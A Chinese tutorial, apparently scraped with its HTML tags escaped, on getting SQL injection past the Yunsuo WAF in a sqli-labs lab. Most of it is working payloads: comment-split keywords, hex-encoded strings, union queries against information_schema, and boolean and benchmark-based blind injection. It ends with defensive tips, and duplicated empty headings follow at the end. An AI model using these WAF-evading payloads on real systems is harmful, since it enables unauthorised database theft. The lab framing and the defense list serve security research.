云锁最新版SQL注入WAF绕过技术详解<\/h1>

前言<\/h2>
本文基于星盟安全团队对云锁最新版WAF的SQL注入绕过技术研究，使用sqli-labs第一关字符型注入作为测试环境，详细分析各种绕过技术。<\/p>

基础绕过技术<\/h2>

1. AND逻辑判断绕过<\/h3>

被拦截语句<\/strong>：<\/p>

and<\/span> 1<\/span>=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：<\/p>

使用URL编码的%26%26<\/code>代替and<\/code><\/li>
1=1<\/code>可以用True<\/code>表示<\/li>
1=2<\/code>可以用False<\/code>表示<\/li>
<\/ul>
示例<\/strong>：<\/p>
?id=1' %26%26 True --+
<\/code><\/pre>
2. ORDER BY绕过<\/h3>
被拦截语句<\/strong>：<\/p>
order<\/span> by<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：

使用MySQL注释语法\/*!60000自定义字符串*\/<\/code>插入关键字中间<\/p>
示例<\/strong>：<\/p>
order<\/span>\/*!60000ghtwf01*\/<\/span>by<\/span>
<\/span><\/span><\/code><\/pre>3. UNION SELECT绕过<\/h3>
被拦截语句<\/strong>：<\/p>
union<\/span> select<\/span>
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：

与ORDER BY类似，使用注释分割关键字<\/p>
示例<\/strong>：<\/p>
union<\/span>\/*!60000ghtwf01*\/<\/span>select<\/span>
<\/span><\/span><\/code><\/pre>高级查询技术<\/h2>
1. 数据库名查询<\/h3>
限制条件<\/strong>：<\/p>

group_concat()<\/code>被过滤<\/li>
select<\/code>与from<\/code>的结合被限制<\/li>
<\/ul>
绕过方法<\/strong>：

使用\/*!00000select*\/<\/code>代替select<\/code><\/p>
示例URL<\/strong>：<\/p>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=0' union\/*!60000ghtwf01*\/\/*!00000select*\/ 1,2,schema_name from information_schema.schemata limit 0,1--+
<\/code><\/pre>
2. 表名查询<\/h3>
技巧<\/strong>：<\/p>

使用十六进制编码代替字符串值<\/li>
security<\/code>的十六进制为0x7365637572697479<\/code><\/li>
<\/ul>
示例URL<\/strong>：<\/p>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=0' union\/*!60000ghtwf01*\/\/*!00000select*\/ 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1--+
<\/code><\/pre>
盲注技术<\/h2>
1. 布尔盲注<\/h3>
数据库名长度检测<\/h4>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=1' %26%26 length(database\/**\/())=8 --+
<\/code><\/pre>
数据库名首字母检测<\/h4>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=1' %26%26 (ascii(substr((\/*!00000select*\/ schema_name from information_schema.schemata limit 0,1),1,1))=105) --+
<\/code><\/pre>
表名首字母检测(十六进制)<\/h4>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=1' %26%26 (hex(substr((\/*!00000select*\/ table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=65) --+
<\/code><\/pre>
列名首字母检测<\/h4>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=1' %26%26 (hex(substr((\/*!00000select*\/ column_name from information_schema.columns where table_schema=0x7365637572697479 %26%26 table_name=0x7573657273 limit 0,1),1,1))=69) --+
<\/code><\/pre>
字段值检测<\/h4>
http:\/\/192.168.0.7\/sqli\/Less-1\/?id=1' %26%26 (hex(substr((\/*!00000select*\/ username from users limit 0,1),1,1))=44) --+
<\/code><\/pre>
2. 时间盲注<\/h3>
限制条件<\/strong>：<\/p>

sleep()<\/code>函数被过滤<\/li>
<\/ul>
绕过方法<\/strong>：

使用benchmark()<\/code>函数替代<\/p>
示例结构<\/strong>：<\/p>
?<\/span>id=<\/span>1<\/span>' %26%26 (IF(条件, benchmark(10000000,md5('<\/span>a')), 0)) --+
<\/span><\/span><\/span><\/code><\/pre>关键技巧总结<\/h2>


运算符替代<\/strong>：<\/p>

%26%26<\/code>替代and<\/code><\/li>
True\/False<\/code>替代1=1\/1=2<\/code><\/li>
<\/ul>
<\/li>

关键字分割<\/strong>：<\/p>

使用\/*!60000自定义*\/<\/code>分割SQL关键字<\/li>
如：union\/*!60000xxx*\/select<\/code><\/li>
<\/ul>
<\/li>

SELECT绕过<\/strong>：<\/p>

\/*!00000select*\/<\/code>替代select<\/code><\/li>
<\/ul>
<\/li>

字符串编码<\/strong>：<\/p>

使用十六进制编码替代字符串值<\/li>
如：security<\/code>→0x7365637572697479<\/code><\/li>
<\/ul>
<\/li>

函数替代<\/strong>：<\/p>

benchmark()<\/code>替代被过滤的sleep()<\/code><\/li>
<\/ul>
<\/li>

空白符处理<\/strong>：<\/p>

使用\/**\/<\/code>作为空白符替代<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对注释中的特殊语法进行过滤<\/li>
检查URL编码的运算符<\/li>
限制information_schema的访问<\/li>
对十六进制编码的字符串进行识别<\/li>
监控benchmark等替代函数的使用<\/li>
<\/ol>
以上技术仅用于安全研究，请勿用于非法用途。<\/p>

云锁最新版SQL注入WAF绕过技术详解<\/h1>

前言<\/h2> 本文基于星盟安全团队对云锁最新版WAF的SQL注入绕过技术研究，使用sqli-labs第一关字符型注入作为测试环境，详细分析各种绕过技术。<\/p>

基础绕过技术<\/h2>

高级查询技术<\/h2>

盲注技术<\/h2>

1. 布尔盲注<\/h3>

前言<\/h2>
本文基于星盟安全团队对云锁最新版WAF的SQL注入绕过技术研究，使用sqli-labs第一关字符型注入作为测试环境，详细分析各种绕过技术。<\/p>